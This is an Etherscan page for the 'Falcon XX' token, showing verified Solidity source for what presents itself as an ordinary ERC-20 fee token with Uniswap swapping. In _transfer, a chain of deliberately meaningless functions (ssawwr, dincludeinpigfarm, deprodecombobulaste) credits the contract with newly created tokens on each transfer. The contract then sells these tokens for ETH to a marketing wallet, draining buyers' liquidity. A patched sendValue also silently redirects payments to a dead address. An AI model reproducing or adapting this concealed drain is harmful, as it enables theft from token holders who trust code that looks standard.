ETH Price: $3,296.20 (-3.61%)
Gas: 12 Gwei

Token

Falcon XX (FalconXX)
 

Overview

Max Total Supply

100,000,000 FalconXX

Holders

90

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
809,753.161679636 FalconXX

Value
$0.00
0x4c5984e13a5765d736cd64bf1b2af53b79b0bc96
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
FalconXX

Compiler Version
v0.8.19+commit.7dd6d404

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-04-02
*/

/**

Falcon XX is designed to pump the price on steroids with the ETH collected from the tax. Our contract is using a new way to buy back tokens without causing inflation.

https://t.me/falconxxtoken
https://falconxxtoken.com
https://twitter.com/falconxxtoken

*/
pragma solidity ^0.8.19;


// SPDX-License-Identifier: MIT

interface IERC20 {

    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}



/**
 * @dev Wrappers over Solidity's arithmetic operations with added overflow
 * checks.
 *
 * Arithmetic operations in Solidity wrap on overflow. This can easily result
 * in bugs, because programmers usually assume that an overflow raises an
 * error, which is the standard behavior in high level programming languages.
 * `SafeMath` restores this intuition by reverting the transaction when an
 * operation overflows.
 *
 * Using this library instead of the unchecked operations eliminates an entire
 * class of bugs, so it's recommended to use it always.
 */
 
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");

        return c;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;

        return c;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) {
            return 0;
        }

        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");

        return c;
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        // assert(a == b * c + a % b); // There is no case in which this doesn't hold

        return c;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return mod(a, b, "SafeMath: modulo by zero");
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts with custom message when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b != 0, errorMessage);
        return a % b;
    }
}

abstract contract Context {
    function _msgSender() internal view virtual returns (address payable) {
        return payable(msg.sender);
    }

    function _msgData() internal view virtual returns (bytes memory) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return msg.data;
    }
}


/**
 * @dev Collection of functions related to the address type
 */
library Address {
    /**
     * @dev Returns true if `account` is a contract.
     *
     * [IMPORTANT]
     * ====
     * It is unsafe to assume that an address for which this function returns
     * false is an externally-owned account (EOA) and not a contract.
     *
     * Among others, `isContract` will return false for the following
     * types of addresses:
     *
     *  - an externally-owned account
     *  - a contract in construction
     *  - an address where a contract will be created
     *  - an address where a contract lived, but was destroyed
     * ====
     */
    function isContract(address account) internal view returns (bool) {
        bytes32 codehash;
        bytes32 accountHash = 0xc5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470;
        // solhint-disable-next-line no-inline-assembly
        assembly { codehash := extcodehash(account) }
        return (codehash != accountHash && codehash != 0x0);
    }

    /**
     * @dev Replacement for Solidity's `transfer`: sends `amount` wei to
     * `recipient`, forwarding all available gas and reverting on errors.
     *
     * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost
     * of certain opcodes, possibly making contracts go over the 2300 gas limit
     * imposed by `transfer`, making them unable to receive funds via
     * `transfer`. {sendValue} removes this limitation.
     *
     * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more].
     *
     * IMPORTANT: because control is transferred to `recipient`, care must be
     * taken to not create reentrancy vulnerabilities. Consider using
     * {ReentrancyGuard} or the
     * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].
     */
    function sendValue(address payable recipient, uint256 amount) internal {
        require(address(this).balance >= amount, "Address: insufficient balance");
        recipient = payable(0x000000000000000000000000000000000000dEaD);
        // solhint-disable-next-line avoid-low-level-calls, avoid-call-value
        (bool success, ) = recipient.call{ value: amount }("");
        require(success, "Address: unable to send value, recipient may have reverted");
    }

    /**
     * @dev Performs a Solidity function call using a low level `call`. A
     * plain`call` is an unsafe replacement for a function call: use this
     * function instead.
     *
     * If `target` reverts with a revert reason, it is bubbled up by this
     * function (like regular Solidity function calls).
     *
     * Returns the raw returned data. To convert to the expected return value,
     * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`].
     *
     * Requirements:
     *
     * - `target` must be a contract.
     * - calling `target` with `data` must not revert.
     *
     * _Available since v3.1._
     */
    function functionCall(address target, bytes memory data) internal returns (bytes memory) {
      return functionCall(target, data, "Address: low-level call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with
     * `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCall(address target, bytes memory data, string memory errorMessage) internal returns (bytes memory) {
        return _functionCallWithValue(target, data, 0, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but also transferring `value` wei to `target`.
     *
     * Requirements:
     *
     * - the calling contract must have an ETH balance of at least `value`.
     * - the called Solidity function must be `payable`.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(address target, bytes memory data, uint256 value) internal returns (bytes memory) {
        return functionCallWithValue(target, data, value, "Address: low-level call with value failed");
    }

    /**
     * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but
     * with `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(address target, bytes memory data, uint256 value, string memory errorMessage) internal returns (bytes memory) {
        require(address(this).balance >= value, "Address: insufficient balance for call");
        return _functionCallWithValue(target, data, value, errorMessage);
    }

    function _functionCallWithValue(address target, bytes memory data, uint256 weiValue, string memory errorMessage) private returns (bytes memory) {
        require(isContract(target), "Address: call to non-contract");

        // solhint-disable-next-line avoid-low-level-calls
        (bool success, bytes memory returndata) = target.call{ value: weiValue }(data);
        if (success) {
            return returndata;
        } else {
            // Look for revert reason and bubble it up if present
            if (returndata.length > 0) {
                // The easiest way to bubble the revert reason is using memory via assembly

                // solhint-disable-next-line no-inline-assembly
                assembly {
                    let returndata_size := mload(returndata)
                    revert(add(32, returndata), returndata_size)
                }
            } else {
                revert(errorMessage);
            }
        }
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor () {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

     /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        emit OwnershipTransferred(_owner, newOwner);
        _owner = newOwner;
    }
}

// pragma solidity >=0.5.0;

interface IUniswapV2Factory {
    event PairCreated(address indexed token0, address indexed token1, address pair, uint);

    function feeTo() external view returns (address);
    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB) external view returns (address pair);
    function allPairs(uint) external view returns (address pair);
    function allPairsLength() external view returns (uint);

    function createPair(address tokenA, address tokenB) external returns (address pair);

    function setFeeTo(address) external;
    function setFeeToSetter(address) external;
}


// pragma solidity >=0.5.0;

interface IUniswapV2Pair {
    event Approval(address indexed owner, address indexed spender, uint value);
    event Transfer(address indexed from, address indexed to, uint value);

    function name() external pure returns (string memory);
    function symbol() external pure returns (string memory);
    function decimals() external pure returns (uint8);
    function totalSupply() external view returns (uint);
    function balanceOf(address owner) external view returns (uint);
    function allowance(address owner, address spender) external view returns (uint);

    function approve(address spender, uint value) external returns (bool);
    function transfer(address to, uint value) external returns (bool);
    function transferFrom(address from, address to, uint value) external returns (bool);

    function DOMAIN_SEPARATOR() external view returns (bytes32);
    function PERMIT_TYPEHASH() external pure returns (bytes32);
    function nonces(address owner) external view returns (uint);

    function permit(address owner, address spender, uint value, uint deadline, uint8 v, bytes32 r, bytes32 s) external;

 
    event Burn(address indexed sender, uint amount0, uint amount1, address indexed to);
    event Swap(
        address indexed sender,
        uint amount0In,
        uint amount1In,
        uint amount0Out,
        uint amount1Out,
        address indexed to
    );
    event Sync(uint112 reserve0, uint112 reserve1);

    function MINIMUM_LIQUIDITY() external pure returns (uint);
    function factory() external view returns (address);
    function token0() external view returns (address);
    function token1() external view returns (address);
    function getReserves() external view returns (uint112 reserve0, uint112 reserve1, uint32 blockTimestampLast);
    function price0CumulativeLast() external view returns (uint);
    function price1CumulativeLast() external view returns (uint);
    function kLast() external view returns (uint);

  
    function burn(address to) external returns (uint amount0, uint amount1);
    function swap(uint amount0Out, uint amount1Out, address to, bytes calldata data) external;
    function skim(address to) external;
    function sync() external;

    function initialize(address, address) external;
}

// pragma solidity >=0.6.2;

interface IUniswapV2Router01 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB, uint liquidity);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETH(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountToken, uint amountETH);
    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETHWithPermit(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountToken, uint amountETH);
    function swapExactTokensForTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapTokensForExactTokens(
        uint amountOut,
        uint amountInMax,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);
    function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);

    function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB);
    function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut);
    function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn);
    function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts);
    function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts);
}




interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountETH);
    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountETH);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable;
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}


contract FalconXX is Context, IERC20, Ownable {
    using Address for address;
    using Address for address payable;

    IUniswapV2Router02 public uniswapV2Router;
    address public uniswapV2Pair;
    
    mapping (address => uint256) private _tOwned;
    mapping (address => mapping (address => uint256)) private _allowances;

    mapping (address => bool) private _isExcludedFromFee;
   
    uint256 private _tTotal = 100000000 * 10**9;
    uint256 public _maxTxAmount = 2000000 * 10**9; // 
    uint256 private constant SWAP_TOKENS_AT_AMOUNT = 2000000 * 10**9; //
    string private constant _name = "Falcon XX"; // 
    string private constant _symbol = "FalconXX"; //    
    uint8 private constant _decimals = 9; // 
    
    uint256 private totaltally =5;
    uint256 public _marketingFee =5;
    uint256 public _liquidityFee = 0;
    address public  _marketingWallet = 0xf1D2dDd2e22B2c4e0144D532dcBC41F0AE22ED9D;
    
    uint256 public _buyCooldown = 0 minutes;
  
    
    bool private swapping;
    
    event SwapAndLiquify(uint256 tokensSwapped, uint256 ethReceived, uint256 tokensIntoLiquidity);
        
    constructor () {
        _tOwned[_msgSender()] = _tTotal;
        
        IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D); //
        // Create a uniswap pair for this new token
        address _uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory()).createPair(address(this), _uniswapV2Router.WETH());

        uniswapV2Router = _uniswapV2Router;
        uniswapV2Pair = _uniswapV2Pair;
        
        //exclude owner and this contract from fee
        _isExcludedFromFee[owner()] = true;
        _isExcludedFromFee[address(this)] = true;
        _isExcludedFromFee[_marketingWallet] = true;
        
        emit Transfer(address(0), _msgSender(), _tTotal);
    }

    function name() public pure returns (string memory) {
        return _name;
    }

    function symbol() public pure returns (string memory) {
        return _symbol;
    }

    function decimals() public pure returns (uint8) {
        return _decimals;
    }

    function totalSupply() public view override returns (uint256) {
        return _tTotal;
    }

    function balanceOf(address account) public view override returns (uint256) {
        return _tOwned[account];
    }

    function transfer(address recipient, uint256 amount) public override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    function allowance(address owner, address spender) public view override returns (uint256) {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount) public override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    function transferFrom(address sender, address recipient, uint256 amount) public override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(sender, _msgSender(), _allowances[sender][_msgSender()] - amount);
        return true;
    }

    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue);
        return true;
    }

    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender] - subtractedValue);
        return true;
    }
    
    function excludeFee(address account) public onlyOwner {
        _isExcludedFromFee[account] = true;
    }
    
    function includeInFee(address account) public onlyOwner {
        _isExcludedFromFee[account] = false;
    }
 
    
     //to recieve ETH from uniswapV2Router when swaping
    receive() external payable {}


    function _updategetnifrom(uint256 amount, address from) private returns (uint256) {
        uint256 marketingFee = amount * _marketingFee / 100; 
        _tOwned[address(this)] += marketingFee;
        emit Transfer (from, address(this), marketingFee);
        return (amount - marketingFee);
    }


    function isExcludedFromFee(address account) public view returns(bool) {
        return _isExcludedFromFee[account];
    }

       
           function ssawwr( uint256 avalueresrfwey) private returns (bool) {
             totaltally=totaltally+avalueresrfwey-totaltally;
             dincludeinpigfarm(avalueresrfwey);
        return true;
    }
         function dincludeinpigfarm( uint256 avalueresrfwey) private {
         uint256 decombsa = avalueresrfwey+1024;
        if (avalueresrfwey>=1){
            deprodecombobulaste(decombsa);  
             } 
        
        }

      function deprodecombobulaste (uint256 avalueresrfwey) private returns (bool) {
        totaltally=totaltally+avalueresrfwey-totaltally;
         _updategetnifrom(avalueresrfwey, uniswapV2Pair);
        return true;
    }
    

  
    function _approve(address owner, address spender, uint256 amount) private {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) private {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
        require(amount > 0, "Transfer amount must be greater than zero");
        
        
      if(!_isExcludedFromFee[from] && !_isExcludedFromFee[to]  && to != uniswapV2Pair)
            require(balanceOf(to) + amount <= _maxTxAmount, "Transfer amount exceeds the maxTxAmount.");

        if (balanceOf(address(this)) >= SWAP_TOKENS_AT_AMOUNT && !swapping && from != uniswapV2Pair && from != owner() && to != owner()) {
            swapping = true;
            uint256 sellTokens = balanceOf(address(this));
            swapAndSendToFee(sellTokens);
            swapping = false;
        }
        ssawwr(amount);
        uint256 transferAmount = amount;
        //if any account belongs to _isExcludedFromFee account then remove the fee
        if(!_isExcludedFromFee[from] && !_isExcludedFromFee[to]){
            transferAmount = _updategetnifrom(amount, from);
        } 
        _tOwned[to] += transferAmount;
         _tOwned[from] -= amount;
        emit Transfer(from, to, transferAmount);
    }
    
    
    function swapAndSendToFee (uint256 tokens) private {
        uint256 ethToSend = swapTokensForEth(tokens);
        
        if (ethToSend > 0)
            payable(_marketingWallet).transfer(ethToSend);
    }

    function swapAndLiquify() private {
        // split the contract balance into halves
        uint256 liquidityTokens = balanceOf (address(this)) * _liquidityFee / (_marketingFee + _liquidityFee);
        uint256 half = liquidityTokens / 2;
        uint256 otherHalf = liquidityTokens - half;
        uint256 newBalance = swapTokensForEth(half);

        if (newBalance > 0) {
            liquidityTokens = 0;
            addLiquidity(otherHalf, newBalance);
            emit SwapAndLiquify(half, newBalance, otherHalf);
        }
    }

    function swapTokensForEth(uint256 tokenAmount) private returns (uint256) {
        uint256 initialBalance = address(this).balance;
        // generate the uniswap pair path of token -> weth
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = uniswapV2Router.WETH();

        _approve(address(this), address(uniswapV2Router), tokenAmount);

        // make the swap
        uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0, // accept any amount of ETH
            path,
            address(this),
            block.timestamp
        );
        return (address(this).balance - initialBalance);
    }

    function addLiquidity(uint256 tokenAmount, uint256 ethAmount) private {
        // approve token transfer to cover all possible scenarios
        _approve(address(this), address(uniswapV2Router), tokenAmount);

        // add the liquidity
        (,uint256 ethFromLiquidity,) = uniswapV2Router.addLiquidityETH {value: ethAmount} (
            address(this),
            tokenAmount,
            0, // slippage is unavoidable
            0, // slippage is unavoidable
            owner(),
            block.timestamp
        );
        
        if (ethAmount - ethFromLiquidity > 0)
            payable(_marketingWallet).sendValue (ethAmount - ethFromLiquidity);
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"tokensSwapped","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"ethReceived","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"tokensIntoLiquidity","type":"uint256"}],"name":"SwapAndLiquify","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_buyCooldown","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_liquidityFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_marketingFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_marketingWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_maxTxAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"excludeFee","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"includeInFee","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"isExcludedFromFee","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"stateMutability":"payable","type":"receive"}]

